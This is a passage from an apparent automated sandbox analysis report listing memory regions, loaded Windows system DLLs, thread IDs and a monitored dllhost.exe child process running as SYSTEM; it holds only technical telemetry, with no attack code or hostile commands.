end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 3240 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3241 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3242 start_va = 0xa00000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 3243 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3244 start_va = 0xa90000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 3245 start_va = 0xb30000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 3246 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3247 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3248 start_va = 0xbb0000 end_va = 0xe7efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3255 start_va = 0x7fefb2b0000 end_va = 0x7fefb2dffff monitored = 0 entry_point = 0x7fefb2bc1fc region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 3258 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3259 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3260 start_va = 0x7fefcfd0000 end_va = 0x7fefd02afff monitored = 0 entry_point = 0x7fefcfd6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3261 start_va = 0x7fefb3a0000 end_va = 0x7fefb3aafff monitored = 0 entry_point = 0x7fefb3a1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3262 start_va = 0xe0000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3314 start_va = 0x7fefb250000 end_va = 0x7fefb2a2fff monitored = 0 entry_point = 0x7fefb252b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3333 start_va = 0xe80000 end_va = 0x10effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 3334 start_va = 0x7fefb200000 end_va = 0x7fefb206fff monitored = 0 entry_point = 0x7fefb2015d8 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 3336 start_va = 0x7fefcc70000 end_va = 0x7fefcc8dfff monitored = 0 entry_point = 0x7fefcc713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3337 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff monitored = 0 entry_point = 0x7fefd8c19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3338 start_va = 0xfb0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 3339 start_va = 0x1070000 end_va = 0x10effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 3340 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3341 start_va = 0x7fefcc50000 end_va = 0x7fefcc6afff monitored = 0 entry_point = 0x7fefcc52068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3349 start_va = 0xef0000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 3350 start_va = 0x1120000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 3351 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3352 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3353 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3354 start_va = 0x12d0000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 3355 start_va = 0x7fefd150000 end_va = 0x7fefd1a4fff monitored = 0 entry_point = 0x7fefd151054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3356 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3357 start_va = 0x7fefd140000 end_va = 0x7fefd146fff monitored = 0 entry_point = 0x7fefd14142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3360 start_va = 0x7fefb3b0000 end_va = 0x7fefb3d6fff monitored = 0 entry_point = 0x7fefb3b98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3361 start_va = 0x7fefb140000 end_va = 0x7fefb150fff monitored = 0 entry_point = 0x7fefb1416ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3369 start_va = 0x7fefb0c0000 end_va = 0x7fefb0d7fff monitored = 0 entry_point = 0x7fefb0c1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3371 start_va = 0x7fefcb50000 end_va = 0x7fefcb56fff monitored = 0 entry_point = 0x7fefcb514b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3374 start_va = 0x11b0000 end_va = 0x122ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 3375 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3633 start_va = 0x2f0000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3670 start_va = 0x11d0000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 3671 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3791 start_va = 0x1350000 end_va = 0x13cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 3792 start_va = 0x7fefaba0000 end_va = 0x7fefabbffff monitored = 0 entry_point = 0x7fefaba1064 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 3793 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3794 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3795 start_va = 0x7fefd2f0000 end_va = 0x7fefd321fff monitored = 0 entry_point = 0x7fefd2f144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 3798 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3799 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3800 start_va = 0x810000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 3801 start_va = 0xaa0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 3802 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4147 start_va = 0x1350000 end_va = 0x140ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 4154 start_va = 0x1540000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 4155 start_va = 0x7fef8f70000 end_va = 0x7fef8fa2fff monitored = 0 entry_point = 0x7fef8f7423c region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 4156 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4161 start_va = 0x14c0000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 4162 start_va = 0x7fef8dc0000 end_va = 0x7fef8de6fff monitored = 0 entry_point = 0x7fef8dc1098 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 4163 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4166 start_va = 0x7fefdb20000 end_va = 0x7fefdc8cfff monitored = 0 entry_point = 0x7fefdb210b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4167 start_va = 0x7fefd960000 end_va = 0x7fefd96efff monitored = 0 entry_point = 0x7fefd961020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4168 start_va = 0x7feff810000 end_va = 0x7feff861fff monitored = 0 entry_point = 0x7feff8110d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4177 start_va = 0x7fef8c70000 end_va = 0x7fef8cbdfff monitored = 0 entry_point = 0x7fef8c846e0 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 4178 start_va = 0x7fefd4a0000 end_va = 0x7fefd50cfff monitored = 0 entry_point = 0x7fefd4a1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4179 start_va = 0x7fef8c30000 end_va = 0x7fef8c67fff monitored = 0 entry_point = 0x7fef8c3363c region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 4190 start_va = 0x7fef8b70000 end_va = 0x7fef8be0fff monitored = 0 entry_point = 0x7fef8b71010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4198 start_va = 0x7fef8a70000 end_va = 0x7fef8ad3fff monitored = 0 entry_point = 0x7fef8a71254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4199 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4217 start_va = 0x15c0000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 4218 start_va = 0x15d0000 end_va = 0x164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 4219 start_va = 0x1650000 end_va = 0x16cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 4220 start_va = 0x17b0000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 4221 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4222 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4223 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4224 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4225 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4226 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4227 start_va = 0x17c0000 end_va = 0x195ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 4228 start_va = 0x7fef8820000 end_va = 0x7fef89cffff monitored = 0 entry_point = 0x7fef8821010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 4229 start_va = 0x17c0000 end_va = 0x18bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 4230 start_va = 0x1950000 end_va = 0x195ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 4231 start_va = 0x7fefb4d0000 end_va = 0x7fefb4e8fff monitored = 0 entry_point = 0x7fefb4d11a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 4232 start_va = 0x1960000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 4233 start_va = 0x7fef8800000 end_va = 0x7fef8816fff monitored = 0 entry_point = 0x7fef8801060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 4235 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4236 start_va = 0x7fef87e0000 end_va = 0x7fef87f0fff monitored = 0 entry_point = 0x7fef87e9e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 4238 start_va = 0x2f0000 end_va = 0x2f7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 4239 start_va = 0x300000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4243 start_va = 0x7fefb980000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb9816b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4244 start_va = 0x7fefc370000 end_va = 0x7fefc38cfff monitored = 0 entry_point = 0x7fefc371ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4245 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4246 start_va = 0x9b0000 end_va = 0x9f4fff monitored = 0 entry_point = 0x9b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4247 start_va = 0x9b0000 end_va = 0x9f4fff monitored = 0 entry_point = 0x9b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4248 start_va = 0x9b0000 end_va = 0x9f4fff monitored = 0 entry_point = 0x9b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4249 start_va = 0x9b0000 end_va = 0x9f4fff monitored = 0 entry_point = 0x9b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4250 start_va = 0x9b0000 end_va = 0x9f4fff monitored = 0 entry_point = 0x9b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4251 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4264 start_va = 0x16e0000 end_va = 0x175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016e0000" filename = "" Region: id = 4265 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4266 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 4267 start_va = 0x1360000 end_va = 0x13dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 4268 start_va = 0x1400000 end_va = 0x140ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 4269 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4270 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4271 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 4272 start_va = 0x7fefb3f0000 end_va = 0x7fefb456fff monitored = 0 entry_point = 0x7fefb406060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 4275 start_va = 0x7fefc110000 end_va = 0x7fefc23bfff monitored = 0 entry_point = 0x7fefc1194bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4276 start_va = 0x1b90000 end_va = 0x1c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 4277 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4291 start_va = 0x1520000 end_va = 0x159ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 4292 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4298 start_va = 0x1a90000 end_va = 0x1b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 4299 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4301 start_va = 0x7fefd330000 end_va = 0x7fefd351fff monitored = 0 entry_point = 0x7fefd335d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4302 start_va = 0x7fefcdf0000 end_va = 0x7fefce3bfff monitored = 0 entry_point = 0x7fefcdf7950 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4701 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 4705 start_va = 0x1410000 end_va = 0x150ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 4707 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4708 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4726 start_va = 0x1d10000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 4727 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 4789 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 4790 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 4791 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4792 start_va = 0x1c10000 end_va = 0x1ccffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4793 start_va = 0x1e30000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 4794 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 4831 start_va = 0x1ec0000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 4832 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Thread: id = 367 os_tid = 0x154 Thread: id = 368 os_tid = 0x124 Thread: id = 371 os_tid = 0x1cc Thread: id = 372 os_tid = 0x204 Thread: id = 373 os_tid = 0x1fc Thread: id = 381 os_tid = 0x3a4 Thread: id = 385 os_tid = 0x118 Thread: id = 386 os_tid = 0x140 Thread: id = 387 os_tid = 0x114 Thread: id = 389 os_tid = 0x374 Thread: id = 390 os_tid = 0x1fc Thread: id = 391 os_tid = 0x374 Thread: id = 424 os_tid = 0x4a4 Thread: id = 437 os_tid = 0x4dc Thread: id = 439 os_tid = 0x4f0 Thread: id = 458 os_tid = 0x548 Thread: id = 461 os_tid = 0x558 Thread: id = 470 os_tid = 0x588 Thread: id = 473 os_tid = 0x594 Thread: id = 474 os_tid = 0x598 Thread: id = 477 os_tid = 0x5a4 Thread: id = 478 os_tid = 0x5a8 Thread: id = 479 os_tid = 0x5ac Thread: id = 480 os_tid = 0x584 Thread: id = 526 os_tid = 0x680 Thread: id = 539 os_tid = 0x6b4 Thread: id = 540 os_tid = 0x6b8 Process: id = "17" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x745f2000" os_pid = "0x23c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x22c" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d804" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3263 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3264 start_va = 0x30000 end_va = 